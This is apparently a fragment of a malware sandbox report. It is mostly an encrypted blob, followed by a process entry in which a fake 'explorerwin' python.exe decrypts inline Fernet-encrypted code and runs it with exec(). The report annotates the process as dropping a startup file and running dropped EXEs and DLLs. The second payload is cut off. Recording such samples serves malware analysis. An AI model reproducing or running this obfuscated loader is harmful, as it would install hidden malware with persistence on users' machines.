Vy6GK7cTADgAkK0TweY30x1e0rLa7iG6o2-SOO5WauMRr6Vuo92jsMIzQ8FfMr9tmQVf8L-NWKOcAv_CmRGBC81tGoDSaQMTSh5cVQvDnSokXQ_SNE33O31U5UW8HGZCruRp6g0umt2fQIgwOryfJZ1wCDYU8r5pnVZOcRls1EcyjC5A9E4Tr6bbpaVKQGFvv66FppGvL8Fq4k-kHNLYyzXL7nQfh9oGUnpQe2c1J0hs0Og1GRo0rk1booAN18jW8oqtTf-QAx0yU99KH6smwhONcJKXmARG4l5htav-iHH2kaiTVVih7YEqS55zHBXICTffcZY1L9G2LfWI11H13Ply2335rGsDcC0vDsQMaOVo7B3aLWBonSkOxY4T_VUnkVK5J0d-D4QHChxKEHw-0duZndQy1P9phxa_1zT6u1H_wYstF2FQJYXvaOLKIqUcCYtaeVbSMZt68nmozLQ5u01CAyeW3gl5Y0O_ngfMSqq-NPCpoGyYxdNguPrutjqKqGtF49aqvBlhziSSiH9N3JgFUhzIkhm5k33tKGnC6DB32HTjCOJYtjlIih7Lj26pKOSiYH_YuH55J3jKlu70kdJg9HuLXlgH87k39lUleDke_q1AVbodQgVLuijFdCE009Tu9CknCcQH0ok6Zz5EoyMjY8F48l4Wl2RIm8YvVE30E6Rvz7upCo5LJoCn264p24nyYGbZCuB4iAv6vaAzr3kGSBT4dh7mGu3UlnFzREC-ZTM5y85I8qPYUiYuVPsIQxf6nEwPTnI3QGsXge37xHaMMQ9ZMU7tnE0T0X9kLhK9OUic_OOVyKKDUC_VHqX2d0BZXPDC-O0KQPjvGG-NGT-LUUUDIuaFnpEd4wBfYJKQi32Xi1oL5jWWGOPBFmGMxKtmjQruzF-hPa09gQ9rYLGj3HO-nYadnAZLbi-tIHesyxgNwU7KPzOBrxBwNt_VY2rD6B1ujVtWeORFf3PR5BpCJN5bPkb5gLbXhqN9GMTV_UUYfqsWJ_xGfgTwU0Wwc4VjRNFlN57BQj_U-wijDrSfn5ld_CdTpQ2mrGP04syMjfyC-bXA54nACQ6IpfBJyKDzJLS3TtUeE3zNdysVuXuD42rYnWOT_4ycfoqOCWVrGcD3PnFHbq_O5Lt2P7-nLxvPze4LjVED5WmLzUDilvRbOqJHhhCXtcGal9iQw27iFl4MwFsVidU7T-KTkn-bQ-6JB_B6yTDtfqlCitVc-DvpNfoFCHXeUbR_CnxnQQmz_P-pMVFEXRpvD_Tp7HdDSjJ7NMpUtqxKllSx8aRNr_269_eQU8NX5JbS-zb17YnIhBXOLPHBAm6ngyecnpSbA5qbFBlyx4GLINrIrbhn2a5LbbWmDrxtbNiTPO-M3uoZkVlpf6-2mkIPV1Hi-6nNd3Hjk0q3xSRnw7Gl7tnmGs6-2JsDYiM1kqivofCc5CZryfebPEw3ipGLhhuCfI8KdyaYWQTDRQ2iJ4rpy8y1ybzerrYet7N2DZwWlxPLDWzk00zH_gvkmmKU9-olXFq8FOU3qGZ8tToDTpi8_-ULvqUvn4BEHqsDHZIAKjKnIjObKrDJIc8XluQlmGpqF-L-vbZz7kl-s7JRUKZ-blhizlhsN8EeSUdtP_8g7hQ0AvF93LpKAMG7X576uDxWmFd1S8D1mr4um79DHyu9Tvr8IS5KCrQuPOKnh5hR-AZNkZerwmoR6ANUGOl7bR8Chbd7NMOHHqvtaeE61pM6QNBjmxlVD2lS26xEgXGAMFMS1B49lrrS7Det6ms3ym8ABPJQwdbiwjTr8FkboFZUYwAckwVBNC-_GUeludRA61VQrkWKt6YrAGMAvqSuLpN6sZq9Tk80ZDjYR7n6qrHA_gSf21tC3Ft-8hDUMKhJ8QLJlYULIKkwJj2WR8SFZVJYAb-QZLpQCEuTcTRpRLFvVkk_Ysb3g3BqOEt1rrKd2QgYUCIi3gnR-qs6CxxcKKeEtOZC6cJlKF1Tkm3S3pSizuucYEC-Y0ZeJ3Gwq6mmr34sWjVFGjSwtQ0Ec7X4o0ePK8r72AlFZWtnR0mnZytL1jv-dQQeV7pc4S-W4EyNottheVQ-ITXOczYwQ_93JDohnvdovO15LmNCwa7MIQQXoS1reb0mK0vjojUyXRNXFzdUgGnzTEHk7LGhJPI7EN77Rjs3jhC649zeXaRMCR365UddwKSYJQk6S17CvkEF6tE3511HKJnXMWSbEJ3r-llNoxRvXPayNH73JYHlStwLJ_P4iVrynLT6LLJuwZXaBqOtkKS1k7T1UJdLpVd0dNMWHZePpvGg8E517aSS_UBmoVm7PF-VCi9zBeSpjnogLYWj7Is2Z9Iw8Fjw21ZBgoO2I4wDuHlFqnkuhXwUpirvNJ5itMx_Zg9j3UqwsM6E-Kt4tYFzCxut6nWTd_wAc4wzzfrCkqLtJ75y1rzawZBnfYsAzcfZk5zSBn8L7JqkrMDXQvzKIi63ynvgujG6f-x63fXmShApKn_trGngeWsjlpX1s8QlWDsvt1d00Rr1ewD_VoL6-QSDiFUKWLTl8hAJoZuJ_4fyduUPiqlpFP9yxJs-zWvD4wkU0dQBH_pIxP44IfycvJ8vr1a4pUsfDBLgaYDdmAO6ix2Sk7UarHWX6L_5ofM6K50QKpZEj9rTLgJokwPeo3izq92bULG-Ltmf0-cUaXqF14qeuc40zGziwoXGs0BQVUPQ2QVcgGjqPXLyo9d3k0p5sOPH8sdSFr3nYVRgjhKMBbv4xA9Dv3ZpBYEscY2pwngrZ14frQvzqYEqK5hlxx8r96XmDBkgi_muELrIZS98gHXpik7TjT40uYFlTpdli1VTaJwHUVi6ea1Leq5PkDo3nFgXFZhFpO-Zo2Vb97tKEcpdTJnmHqy6h8MzDNxYLEwJoqnI7mOAizA74j3LY9EO4J1X3CNbTYo4MOveSGaMd7v4odVijwFSQmV963G5jNsetVBpudxzk0MvahhaabxA4XgaY7u88-S1U49UychUGYvFhcuosEIO46SKPNAQ2MJt2B8_FlwMBsC76WiFUSCYTyAAqXDCDyZ-8yf0w4B1SQkVoR-N5iHW0Y11pfMBV7Q0KgFJzCZppTdZbJ7cKVREjW9CMpWcM4LZjVF7tINgAJAU8ZQl12KE-1gReT1fxsmvLBAxNgofvf3na0AY4ycE3S-P8--YmZ1n5GwMvOWsAumr-4gUG0QieB3Jxhgi8e_US2mFm9try42p19bVA3M3DTuNNBc5IBAfIyaoV2UBHVBazq4inuXVVCCMyJ0Tm_Zz1YSd3DnbPkce2eZD3m9Hp7x1JXmbmkNnIZ8Y5tVCTykwRJIR8my0Z7bqRhY4GSe8KOlkJMHRfgdohGEqRXq-oZ9QxiwStQv60InmmqFdEjlBUd5JmsGyKMIlFyTbeA27ZU4t6SnyPtYNOvqVcgbgAEljz7xv04n_oAbnvukn9ni4TLZygvsM7xf2hP9MuTN3Xv-TCNTic6zV9pY8dPkc3Ec-O1ufMlbnXfEXdypxv_LJxfALEj618wrv6_85kB-fK701wVnwk4PKENuovspV4Vh4IXdLlIxAI9c3-ewIsy6VkQCTY7oS86q6cDcXUQLhb-22EXUaGzBSldprg8TRDy2PMGviEcCtqZopnsYjx7eFrY2Q61cf5dV2FDCJm6FMKea3LMfpCo-4KGbis14W6Tfg0RYU5Py5e1GxPBOX-IoC5lleFxEUFNb9eFK9ei8f4svrwsXfgioW64a7VU0yvgr7pIG1ELxTdxgRaR_YrP_vtewOyrlWC7sseiLW8FTFZXL60jpVb7fUqpJaqxlvYOspr0KIHf3UR38NrGAr95c4xcI5GeQZhMpROTkE7LOQ6g7ppjnhtIHjsAQsCZBo8V49BUO1LszqQ898__iV2M_tKq1GLPDSD-Crq4Rxt3q06qOYrgAbC5EMC_wwLzZNdwLhDZnO3uTNLHtXpJoCXloq2KIgOZCHb9vB6f7lXf5JkafRLYpObYunZILO4De4pYBB6X6F-NgIwzQrrhV-9x77eCzauS4CgIBfI7RZGshvrSrECxxS4CgxPxAQ9I6Q17td7Gad-shB6b41DRexizKX0qxqf19lDCyqwlvA59eGjUyWs5xqc4WO4cx-quWIsGg52nWbqxV5HOHbuzKSiCP0ZOlPmrCQK57Wjv-f-J8iOHtr649TTCy6uqj1SdwcKFFjMIUta67A9MLxHSY6WR7q-S0YMOj5wGxpK1O1OjGVLDRJdWnfyC-SwXOusTjM3BGZkoQe5fQai8LXq3Ek1V_6vnGaW5cBR5lfEAwUxKGO8DGXGExSoTkAd5CnSlB4ueJFxYlKeVWCs1Ry-JPJGIjGy_xj1YepJg3RLRmTvaeiYG1SHvPMzpy8qYK8UkJn8z_PwGU0r9KZWaaFuWoTbZeU8NR5verEOtNFyMOROJr3UIO9Z-NYOXnNXZ8g-tfb3bVmdMZRgPe3W1gfkUJ6vcmI7GSmB80kTdBsQwfGuQHVR1jrQkahI-fYvH3gxYvEl8CUWEL-DGMUQ7fEY8oc-im49NwjWQ9s_3timTkONYPfKTQKGbDjzX7eGPtWz5MErlmmulrJPX5HhMqwVH3nqCoAU7ApXqsQ2leMTs7KixN6dU-7qdZ9dI_0j3Pv2FOueE9MsqAOtP0NeFdxkjSxMhK9AM3dAz2gYjuL5mZXLBsNmpoMxuDrkBHZaBz1QrY5Ub36Ow211EQakDBINk_TvQ8FSP7HpPd3ZE0wQjx82-2Dn0yWXRj16sGxTkUc9mYUwI8n19iHPKanL7Wt0ZkLSQEwLYRiPhdinlwA6__iV-9ZvDJGP6Dy7IjtuOf44n6XH0phTzTLdyOKFy_OLXnr59AON2MKT_22NUZ3XXyTw9zV5JUe3VW3ueISMJ5obWZbU9fkUxr-XHbHRhUBORBYsWA3qFmyAsKf4n0ygKuex2Wyfy_JoS0DIoFK6lhsGnADHmAHuXYnJaH-a0XrPqCoFmTIQuO8AoxLkhk2gcBivfkeKhV7vCOp-wGz4EO97aSw2Qz3CuQ_AzuEGWH82oR97Iih8yQdI3qfNq3cu95wjhtlpL1yi8Rosg4ur7RxN6rcLRHKgYP6gbuJti5Z4mSy90niJxosNLsHe5crc9Q7HbjoCE2ByqJ20zaPSGkNLRcxtHYAOjdJRmdJjApaJpJCoVw4z2kDs3RBfULbkOHcEgFneqkShm9aaLxZcwTfCcekjAACoLXAu3LFbv80WWrVkc0rhnbC8nzy9fGJlAjQB3bva65HXcVLM4yWTnPDRwrMAHjlnb_a1kZshEbQVTOIiCDTgJHwPoZOCwnU_xZ736Tc5l3282C0ferUFMj6ix3NH877jz10rXomD5NfDuQRw2tN9eti1payHoQeT12QYugCg_vRT_YVFbqmL8uQcdTL9nVXlV_vRC6_ER39gFc7uFnPgUMxAJwDkMuxQFzRA8VN-KD1utzouiGazz-oV78uDQ-qs8QHYtYdWRE7FYz4Ra9s9E6ifkjSHUGb6lmapemwCrJtP0XqLLuJahuH3M-C1BGKqulUV5jW7GOyW1I5ceO4ZowJMNPm59nXQB-lduRN0B38siOCAej2EhWFW-eTQJbdGv5XZ7naO_JGwEjbdiGDvLEH_zjqpwcN7bMe0awFa7PcQafjhGswQ12KoGNIpCCNDW6zfKBLIpT25XlfLxLczJowdhKyJGAraeYSaSh3BmTdGx1wiiwmlMPPfZMkMl6E48Fe5Xzr63HnGBffiBRtjE4bVJz0JK_5QE6X3swu_uka4e2tysAyWhH9jMWLJLDkZvjfkvWXq1XVbe1eu4INN4Ir4jYx-Ur8WLWnFCX2cM2_it45UVbsfS8X1gX7vkEVnNwE4vQxCXvLufcbcaTyE1rWy16QGNZPAasGgFr8QOqpq07egJWVwq9YvAZvVg5MnJHUQylcLngUBlEe0na-U5az_Nq8qP_GLYHX2RSaAIbrnr4lyFgbf_yooh9OXCXzjR7tqLH1ie3-DVD3fJBIqwGn-nNRHW2OdET8MSH5F4NvWp0OSoAycAtiPPEktUGXxrbLmh59tlNgIevkj5yzsfHK6sCn7_MrpaabhSCSbrkodhIRXySSFS21inXQuqMhWo2XpwqDLJ0NkzvrBtlq3myjnENk8Kv5NaJ-JWyPv6Dzm0x25NG6BXk6omS-QJ38w06oxq5SM8F5741xzpE4JF2tkKAIf7fKBg502ssemcP7RsKW81kLsbMpR3DF3LakoHyu8_prD-wGGwwb1nfB7DyRXw6S-3NXcVy_RGClfLUclM8wU8yNH2B_4NugFEmeARHm9ZBRfX-xsZIplNIX5wL7zJlKUaJe3jPLjUzaDry3GLl43SBxtRvPLYHznXmNiwKLLWCmHXxVyfBqk5WnQfZ4enU330xesSmzG3JS7prKGQ8jyvkcC-TDIufgV663XPZPTIGgICyHtcwHkRh1HyMEmt9T9yjKU1pJEbURzgUW_vj0N6tS_uq_2pHcgHvpPFKZw738D_G2Z9ALfoyjSCf6s76eNsvF0TyGmSN-JJMiLTB9Op85RMh6S6Few8tMiYgEH5GXBA4Qt6YDGllJcY8ApQIGhXd0UUPh_ECncx1sE7QS5odD-RS7rgR4QkEFImbN72vKbJymDwsH22eoJrRe5hlm7Hcqbdq8qEvpp737gvWnJklyc92pwk8nINZmy-_GwPaSZReI5qZ3G4Y-zo35om1LaAhU4Pi6In0lqprptnDObxk6jkBhZ1jgZQMi49IXt8WcPuK-SD7eNEsd25W2cbx0MQpD8Y0wEftRpsQHr37S4zZzdHVnQyeLmSx8GJmV79ULivtMbcjeMtfqyzgJ2UHIM5Iv1UppiKXewB7Ho8AuFOgiWR0C9yk2bWiT3JJ8g5Pyh6_02UM2u2FHOrpYl1JNZemUoM4AnV7Xi_63pQPpdjH-b1fa0_uvlArz1m0B78JTOgX5hYVNudyboJJT_i-7ipp8mPMGGjMYIKJJyCY2GyOUIoycFyJqIYDUhxEEBXIaoe1PrXHiCK1lGycxjL9zTYrsZoMdeoQqDbox3p9JMEkHB08CuSak9zkMZtIBy_cRXy-YhSDUNYpo61epQiWdFLrVND36ij88weMkCbNgPDZc2AqJm5z3iVPfV128oVgAHuW4yvEPivK_CYytQV6jYTHkJXRqyMTvsjoMMVhIie-Ac0THjj1TqZNdAe4T2nMmaw9AfkuiqtzVM-n13bqHZKWJZNBtvwivW-Lu7VMKIhvAFbAkSSSINB36nSkapBbnMcFw6-Yi5a2nmsK3bvWmcX1LjOFm2yfktls_kYsNIBLfKiW8oz88izAQQ5HWyzZM9MbKKOHnMVFJPbTntfT8q3dwkizJTUeoO8tnvpojrOLqjR5__tC7eHArby9WMGk1O6P5O1WzNrcZqtyLm8uLdV2NmL4VoVhTgHWt_A_177nPICgECtHOHq1sELkJj_-SYteZU9pAJZCWytFRbuAuGrPLxxZYQO4HwTuEoyZ2FAkfNlUx7dbfP9mNZK_fCxqloaDWpkavvA-ohf114vDy6Wowe3Z0Zda0c8hrxcr-_GG1l3hQZ5yf8nHWLY1XirU55OG6_qHpYYeInZSQU5Y8UybkvpIA5s4Fe1Eyv2Q3f8uwQSPbCzaSuPUf5G8M3vHFUTVoziYmN_9WGnpWvmSXMAI5UO_nBTTKmYpj1K4_KA457TtxoCIRLTuw66Zo9ZqVS0QZRqa-Hu8q4dZRzWH4olLdcJTgOLzdE6CrH5WnnLQF_ayvIV2WKDJxaVb8_1eQM4naQL27W9zrCqaodD2bDHrQdwLXeAeWYnT4bwJu4Vc10LcAttQxsR0YcSTKKzRk8Et45KILC5JkXRkSPtBIn3eUdRvldokB3CmL6VdORULIKSYxjlLdi7t5Qwc-6xIf5LgOI9hiQnE9lxMYfkha-Ui8oQqz9iw-v0pUZKuQm6bPuaBWBLndg16qBD2YwrE1LWCy5o4ZFnWNOb5ERXyvdvdyfGx-b0ZtkQqeXrnsnVUho24673NtLuCLUe9r-ux2NpMgpIyCOPD8FJ_bQtTxacEqYHjWj16r-fvAaiZ_ivQqJvnWYv53g6sUAIOMlhKxQzwXYvynsGk6Uj-l9bKAqZnQnUti5curfq56ajd2JR6kC-1Z7s9aEl9Xv-fewPSpKysM2VW24A184HUGDtwEvCo0Hwf3NHM478hmeH9sMpWUAG3c3XeNNxEigt7rlVf7enw9DXeER-zDG3dIKry8Ch-m33eSxnFcmrphDtEy8EElh_0MYB6xr8wbfHNdNCI_amEVIinYSdPv2vZe53T-BZA-RYAVvi7F2c_rHu8-JWd6-iAgJcgmfZ9F9Eka0wBFac6N5UeCPpIyDxCssJBQsrJdBfDbxeEiTMcB_pEUdXJA7gFG0FRQxMiy5PsX1EXGSiMj-i8y2dVSgCYsNNAp4gmoTAIHZvuc6Qw2f82GEqXrJCOmF7CepKMiV4gRVeC2K0mDQ2AvO44voDusPwxc5kNW-u3_RPAqs6UJlrkVxa_rmA7TRD5xk1MNXgu8_d75w-Uw5e0cjRknwKmwDQCNWRhxMr5TTKivBBb6AfgfoUZvOXAq7luw8kOs_nQ-GFxYIvzdc2oUjbUfv5D88eNfL59iltnmkS46vUJbq_l7-UrEVTn8mtm8YfmaNOpfwHegKaAv_X0J2X_lrmvskUDnsCwTWT5OqfTiLtdiIAuTJG4cnTB1WAQNr-6lHSbDXleZTlaqYivVWXk703UuLyCO4VmHnQ6__jG0VWAI3azn16OW2hzuLSo0Nhp3rLm8gETwvPOD4oi860UJnO-UTGy9IUv4I5fqmKgXHpqavsc7ZOVQl8am96ipB0zZOLwdZkjJjfw7RNonuT_Iq7RVkH8c8LOPsYXdOj05pHmqy-x9LhGGx5DQwRHoQmjA7NwpTYYaXqEIyUJCle7zHB56gBgaIvMYbaPUncMtD7HlTrsLcrY3t7L8-G5gDpSVfqHO-viqF1MWrAbzDsYtGYpgJCDRZrJUhdgqKHv9PIPG3DyMxHl0V21jFJgX3BWuIVCh5LQRopdG6xylKWbtNkVcKK3DpfZjIx4Y2HoK9I9w3OcSKhVL9Xuea4NDt0pLg_3zBv8aq4fiKqWIqM7irFGrlgAzfptmmTbBZbTg5BU7FUlGwbUv5jnkNkUJYNfX_WEi4hIK7YPnFVqqQFY0poBEdRXpiLtNrNm4wWJ4GUfgv7_XoFAKjwOCenkq9x82gfU0OWAMv2bU3b6V29fJPWmHZz921q5JDOjfd-TAA9bxUjF_FRVh9IVcI0FgpXqW4ux2KSSm6CR50EiObd8zmQCg5LjEUjx-3M7voHyutsmi1yR6E-nY996lmue4cDgg-zKJeL463E5EWU28DVWOfxaiqQKtbFTcf9omiHrMYP2GpBXLEPdm8brfYk_ZyfG2hka0M8cI3UOM1IZlsvf8SzvaUWkmHmFtQjiORpNwsUkJr9dAhE_dYtAGn0AzZmV8G2M73hqCK37gi6Wi8DMjL2aSyQSxfhtkzAsC6KBs8_MLzartCEu92HqM6pmgYi5MjzLSADJdmWY0VAflSdodItnwnywqUjpfWkRty-Mkw57fIzlyW29nzGR725RbQYgrIvX3n52yYyTpUByjre-k1UkeEI76DreIoYpvO0uyOQ1BG9dkYEzX9WuoRcim6N9OBtbPToqJzx9_Wh5hZLDQzIs4jJzWZS9rP5SlUPkVs-vFIDTphQePI0V0MjmEaZe2CjnoSrBQPwnZkOMGZLZHL_Midw3BP_Qy39y4sdEgPbkSw2nkcICB8RF9OXsl51dBCPjG8b4QiXrZ2Qd3eKR8JNyP8ZMqM2B597eHQfnL7Wr_zlHMefR9BXv6Ho0PEoB4l-IEGiYXlbj6vCCJJ4HNDVCH_CU8bV3xuTl8f1vBccl-gSyPNbnXWoKDgxF90wDVYKlFL9EDGcdawSX3not6nZfj16kjYWx6-j8St4_RR99sExUXjGzcZu9VF9_7WG7fC4Pu8OAOPH27BzHY1x1Wdu2cq6SqOnztXoIqSAndLHSQ_fmTghtkvDAyxyc4q0MRg-Ox00YaWiBk3LDXmkQWtUyzg5SdRRgDyAsJ0TJFHH3TjGqtyNRs47LE0dwZRghDxj1Xf6dpmL59SLoGgIjBBd71JcajVejHJ6WxKMqV1lutDk28NHfzEfOe24l8ybRf68PAI_oqN4Yb22XiYeSIKBsPfhOCAGYIMXmU9-gbCsXn2zQf0UKygDvE90x_IZkRf0qmsudPKR0elHyWKwPuwVQwLvDUclQtDQnkQNh_IITfRQV5eyTmGHKdUTc4FLtlrFWmX2KcjV461Ov7TwP2rnIkoPJOU2OKMAB2DVZoWzdyZHJdVYQqpdJZOcyLmMCIEWgYMr1kKNoFP-y-YU0-OCSRRxd30lew1_zrUsvcRR9yXkZI880hV179liLWNuZIJUvsipySYtYCXT5BfoNA_mdbwf2X55LPh1MsRisAs_r370g8qtjxxFVIaLuvuAtobNbz6YRWACWiK2YL1_9ZgTgU9PesY0Up92r7sXStjhGy2CesyHduEPQ3BxQOsPOOnDCPcFGx67HoAfMMZJVCRU01b_zeHWIaIBJJ0USxUwu9CHAam58GmN6wwlSWBfaYo2crNq1IOUjxroB8r97_NwfTwaoQ_9FF9UsvZc97ZJhseSfawbVmJ51xpw_wQg8UCNN8KrsGTGBKQlH1eLQWQz4DnSvTS4-EFij2Md104DxbuJXjtPO-aIGheWWkxIjGg5HnJdZHuK7smweKBB2cDXAc4K1MS6WzBq3SU5nyWtwHVY72R0ES0Z8FXro7TNzFNoCDbahkXHC_7ulqmFo80u17QStdfzX4GGDFFlHFBMcaxbQDzP1Y3T2gQIJ5CaaQTKo0gPbpsr1WSvmn9b6qS_sEeyn_7pXA7VmcAVFSYHvVxIdRXAzq3PuGTLYRcLRvJINA-z3rAVr6IYkT5U_QUd7lalY0mk0vSJrYZLoAkPYojNWK0HbBXxc2k9dl5UlFT4USKNrhXv9AYTVLyE2v2A2H0NgR6Z7IMWOEhZfCfrBZyBM-abrNiSRVZnq5aRzMh-LaTDv_naRtLEhw32NdlJgPdYgSCtudBEcJmdK0ddqag8Wg12zm7oDmaEa-WvcpAZ81XGhZa-1__xFi2nSd41e_HXpF0nYJEU3yAjOZ-NHRVsPD19gMtVOqNRiU0WzSvyXceAqRP6TjfnCSvaiCzA4QYf7-FcQmjYx5nfkoax4vyD1lehzrZfLc8tRFzDKuN8K2o3VavimYHvaYX4Dk3cGIRgJrsuUX-aQPW6X6l2lj2pR1RK77ArrkVQp451Zqss7Hz7AbwDVws5iizRvz9KsPvhYOImU0dNg7MC3rx2hQcuyg=='))"3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
PID:3376
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'j0knKB1fYayqDZdr3iGITcnODiWrTBl_F7AEhafzEaQ=').decrypt(b'gAAAAABmlIZG-5z-Q-VJFUzD7mGIsIC9NbfFJqrot54uCOKzrbEThlA0dhAqaxg0PUX6o-ql3DTKP931xblKRdoj6yYlD8LVUY1QfmN14oKD-sVejzTCYOIZ9KtlKt9Y5fS3C0bovi8ZTjpJDBkjl3_A3ooFRN7oyieO6cx0B1qlQRjP_gm7ATJNgiwFTirHi2iS0VZtXmXU1roWueXeTSAG1nZIFzuRxjfyxS_XresaorNn6lucjKOVlAWGNqR9jWxKIf4bZ0RRVajRPsPiCYjCtsrRnOmxY0L8WBZrVu1fcTaOckK7nP-R4vn2FfmQy_JETcxfB2zsqtaB5NwolnVow6kB0pHzZpVdzGTS-c3ZbDvGXHJ7iJGttW3coQeOWnPJpeI6rJRHwUmuzCJT8gVts04LJ3F9OYVjHBx0MEFZhwJUKZYNTH6GTydCFpNtf-_MtG1DZv_VGrWxFTTeE_433A-iEK_aXDUhqvHTNNkqvfM_UCVF-VG6o6cgQekf6op1YmxriTe2O_IvQ9hxGUuFP6ChpmBZwQ7CN2xHFH4BKuXGMKtWjlJAtoUYQqz_5IboJpNPlhMCEyw9Ea6Po6TeqcMupgNfgjChAAsTfWlni-JwmpDOpEpjOJENrAzTrSdD5Q6vd0vIzItdewd7RWVeYqdxiyuB0W5p8QpGPyvoQrartozVrziyGFEzDMLMWBCqoddZYdEoiEDA34tFAvXeDt_HeUSFqpjs2dWrtGX5pXnNSnmIxj4k0t3RtvZh-otWP1ecMtL9nIkQRbFsYXsUg2qgjtwacCo5Q55Mys1bnbGg_GISb2ShltyFoY79cXf1I75wgokLqNIK2u8DwG4eVPRvJHGaOcaDn8ef0D3N5_nx5r-bb9h5VAIGx0pY7BsfOv_6owbC1GTnXP2HLwojRaoYdnmbA1D7bVg0VQV0ganWkkxDmphKDrWjfF8TeyBwUlDLg7zWqyA_3SPTwFV1OII68CL2matsOlKpaVrhXcVBkPIzthtxu4x_EVTV58w1R52DR8spKSHCGFqloKQ7EcpSMxnPiHx2l9ovvr7wRD0x5AARoOe5l_Qxq9Yn-fHR6kocYAgodmsEcFyerloyJjkYM0-9Qm_BAcGfQuYnXuDDZ3iLKPemKVRtgNUWV4HkaFEhHOCz8uJ48kUG9UX9GNjbcOJrSsmM0_sZSMyg-j2GyGpSEnG0vQPNeV5Dqsths4Kus__Z27cpTfpbB3SQ5pwSX1wtwWBcHHXXFBfRpUaB7dZpvV0KsahHe1ai5rv2KFUqHUJivnkwTwqWuyvmfji_Rn8m76VhoWLCcjcU1p4CL3JwHPgpjii6H-Td8FQu6eeKagOD6fDHQg1V9mjL82EqXJjWoT2Mpmh1m0xvlHR2iXHB5UyQinY8N2FbI7s1nQRG_8UdswH_5QyRqTqNCR6atSLzemzEtkFwnrMMBzrL-50xt1NQLa_rLzZjoziMVEZ9FP7e1A9CVaS-MAuikIb8HjrLOiYEUCbh41sbQ_cfeQp-x68Fmj2WlwbnFbvozdlwO8bRYJ_ayg_i-idkbAlPCNZEj4GEpT5SsF4L-0F-qLCTlqnR_dVG6rM9sXuURZMS6fnruvv5f4GD3fhxEKaXrV-u_2zurxgCjzw7s_WuqaCPznpWfYKAI8Eph0uo-9Qc0EDLOEhlonBJMRbCPt-UuM6WfHDKWlHyeJtZ1zhUgGeNqayBMhHk4HIwrpXA2mM0pnoEvhmG4950wlr6fvVwHTmbN599AHcwVCn2ypV9cORyVDzWelgknee2aMVWfLJ4O7lytm5zZrL5QzUONfRNACk3QMBUqwkjZL1apm3hAHDV6dyVP5QUkqpWWEzpQlQcFnAkNLAb13HifuN5gYXlueH8H07uqr6GnWAq4cAOxKtheadXQNmHPqg0mNPCw1OL0KcFDkQcGk3VGui-M581Z-nqTngkldga-YbFkrhHUXgrDuD-pEWSQe3IU5jlheUmEhIY86Ksn8NXaWdR8HQP5o2Qh53-EslHtAXB4y3uH9wOPEOJtzEXQ67sO7FzF3PXmBYi6YlS7tEgaT3cClUkSs_Vr94rTvMdXZmOM7OuzygD8MYdi4LOHLPCXbVFY2On2j4vxDY8mUDKXuYeiQ32ZHRx-36Rw50gk3po81X_oNfIY_bIx6sIXGb8tdjyvci1EkwRTqqUTHQk2Yqhf-o3h7MTvhZ1Xn29CYCM2-cydnHhjr8MAQQegVbRmGclqx0g99eDYiE5s07XmfEatjM-tCUbmufOc2uCSmu5jzQ3AigYziRNTNOPdS-FVhpbOUQKg_IwGUbXAd5Z6UpRyjw9BQYl26ur_uI_XZKyIYDg18iRPYFTO1oqUJnGVX1-7EMOLbHy7jfvbxovzGgk1U6fOTXev-qZLqO2zW9neABwA4yAne0xaNW_SfJMNDg-ppjorKpL7Hlznqhq9uLcwCb5knumAHmqZ7VQnuujERQ0-LYMtnDqkpOoEk5a64lu6kF1IarlML_dt1UikXLapKr6WCINbJVVS0tT8SiZQK_lZD0sMQODc9cx-FnOYfccv9F56dvD_eumWnyM5V2QtRfJx4Ek6kq5_BgPa2p5fAeMdEHOp81Uch72ZgxiSpsG64BwUDUnKDiK9XO74mDFUQNhPn8loWDSqiCq5NCKYNRTGGyExiniXNrAoEsEOi5zovxTp1Rz25YBtJtvbmMS06ujRHXUIP_f14mxb5syHgviqwcDhztH9vK-enF0e7eg9SkAYtcqo19i7ks7MynOHCIqS6YqTTWvGapiOAQGzLw0qO7EwoSZ0IPo-sJUuVPTiR33XeVtP_CW-IMd7WfOLh9uG8HUwYcTIKkK2As4n4UhzUM8wnEmVQ-dBZKaO9mbAatNDQvEzsFpY7eQ8AO-1tGG_1ZQC8W4VPSOzn9I7lW4H__eOJWO701zmsTLmQCxCK9GmHreRp5EZ1XRB-dH49hZfv_RddQkvhQcZAvJjROkMxZ8eV0T3kv2A7tZE3fR52pwI0HyM0hQEinaVnOLOIdVW2Xzg_2guvLnt3X1YAQoJ6ZsRh5huCICgfh_VPouavfLS_tpP71CzuWW3uuBQzqwMHW0q9C-DsGF-Mftk8FaiL2KhDDxzVFrNbtaIG7k7BObn8-R0f5VdKlFeiffzGMJkjYNPq9K518E2r3DVCMNc8F3wN-weIV1I0MGCWc50Ca9QIbHl48q2D54wqPhEY5uWpRE-hbJUAL53e8gbeC71lGCO0lfzgKR-1QqANX8DA0ZCE3FrtcXSEPZTNY1GARvwa-9zUnBfqm28jVtYZ1UR7i0Kfu1pQ7Hzia0k4SPOx6ghO7LisOnbXYr8D51-fvgeFo2-b8pgnSfA8e7VAoNvidvKvHEmiuGmwElwl4Bpb0H3xD9GP6h1OdriwyDHVcDEsnr8JWHdAmmWsyffR2Lv0WzL3KT2a0JnC903JJIuI31eK3v68arAKRlPfRrntwV6_VCZq7rrXza4_4xuDDa7ytL7VBkGP5H5AZjSC58IRvijGTJ3nH5a22PQ5AlYkudDkG3ws4WxzLCLHbzzD-FN7CON6Xp3ANa4lVNlJQ_H2O7aoXSSi-DayYET8vq8wLHbCCQCHhERVucCqHCLLLHB0Qhmp-d6gfMAE4uWoHomhk_ZZggTOSTff1ncJlQJRunaQVSn-N_niej1vZr3is-JpdCxlj024ntqY9YDU6zU0KvNHgz46Y8jozo17I7feavN1QcwGNoST1v9CmRWmka14kbGpQlH2bDIEwf98xUU91nHOKKRrAiOKF3phLnk_aDO3G1yFdRm3VkzAuME8kpB9o9359gxEdUtEYkNXKJUySyv7iXUbNfiYaaT6BQTyAqmIKp37iniqf84h4Sho0ZXv-op0_yW8odhF0J2hvrWvqI_pe0TdfliYN-eSqtRZ9uZiHGZQPCvXYlHi9IfZeI__HwtOM8g3rBWGucFVmOl08olbLcJbhrUsHKgqu9TphOP8fEqmlgVsoRAmsn6KgGDYqXRKDXoYRCmEV94zF2cMiGVenndIIu2QZ9Q-O3gYshBqdvJWoNZAPsLC1MpnRSjVRG_Xvi0p5kpB5lkCUfXbEtfajqvK6hLFJc01RMYIXpl2-pMTg95YFeQgl6y0WeiqN55Ui5y9eiReEEuLR_VVeaWja1teVT4_ip1YVlqAa4eNDL5xS